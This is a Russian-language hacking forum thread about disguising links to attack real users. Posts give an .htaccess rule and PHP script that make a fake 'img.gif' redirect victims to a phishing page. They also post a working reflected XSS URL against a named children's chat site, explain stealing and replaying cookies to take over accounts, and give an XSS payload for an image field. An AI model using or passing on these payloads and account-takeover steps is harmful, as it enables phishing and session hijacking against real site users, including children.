Этот способ уже многие используют. А я все видео записать немогу. Времени нету. Это так называемый активный XSS, но с ориентиром на браузер и т.п. ограничения. Вообщем - не панацея. А так - можно. Тока под браузер Ie и только если это изображение будет открыто на прямую (в адресной строке - полный путь до изображения). Содержимое: Обычный html с редиректом (или можешь на JS) + <iframe> на всю ширину изображения где будет путь до нормального изображения.
censored!, сто процентов уверен, что в твоем ответе есть какой то смысл... но какой то он странный потом говоришь апачу, что надо обработать pic.jpg, как php скипт ну и юзаешь потом, как просто снифер ;-)
а в чем его, ответа, странность? по-моему он это и имел в виду. только он хочет несколько другое: типа послать кому-нить картинку и при ее отображении (когда она вставлена в html) произошел редирект на его страницу (скорее всего фэйковую). Вот я и ответил - так не получиться, а получиться если тока откроют набрав полный путь в строке браузера. Просто он на форуме спрашивал как маил_ру ломануть, потом второй раз про изображения и ему похожий на твой ответ дали. А вообще - если бы он сразу написал что он конкретно хочет, мы бы тут не гадали и не предполагали чего и как. Как твой ответ правильный, так и мой.
Если надо чтобы отсылало делаешь вот так: Вот это пишешь в .htaccess: RewriteEngine On RewriteBase / RewriteRule ^img.gif$ /img.php [L] Потом открываешь img.php и пишешь: <? header("Location: tvoy_URL"); ?> ссылка на картинку - http://tvoy_sayt.ru/img.gif
censored!, я не сказал, что твой ответ не верный, я сказал, что он "странный" я просто посчитал, что он хочет данные отправить. Zadoxlik, а вот твой ответ неверный, правда, если картинка будет в теге <img>
xPow, мой ответ - верный. Так или иначе переадрессация произойдет, просто если это будет в <img> пользователь этого не заметит. А вот твой - неверен, т.к. переадрессации там нет, апросили ее. А говорить апачу, чтобы воспринимал файлы с расширением jpg как PHP-интерпретируемые - дурной тон.
как ты видишь здесь не указано, что посылалО. если был бы юзер, то надо было согласись. а так выходит, что ему надо вэб-снифер. P.s. что касается дурного тона - то дурной тон, это отвечать на вопросы, которые еще не заданы. P.p.s. и если автору правильный ответ действительно нужен - пускай уточнит вопрос.
а что касается, неверности твоего ответа, то он в том, что картинка не выведется, если только... но об это только ты не обмовился и потому он не верный и вообще, что если на серваке НЕТ mod_rewrit'a? что если админ ЗАПРЕТИЛ изменять конфиги сервака юзерам?
У меня не выйдет??, А у других выходит, меня один так послали...просто быстренько присылается что то в привате и я на другом сайте...
http://vkids.km.ru/regards.asp?vozvrat="><script>alert('xPow');</script>&type=only_nick дальше будет. если будет необходимость ;-) P.S. только нах тебе надо этот детский чат?
дальше все стандартно: воруешь кукисы и подменяешь их на свои, что должно дать тебе возможность зайти от имени того, кому они, кукисы, принадлежат
введи это в поле картинка: http://"><script>window.location="forum.anonymous.ru";</script>.gif P.S. у тебя есть время пока я не напишу админу + он не залатает ;-)
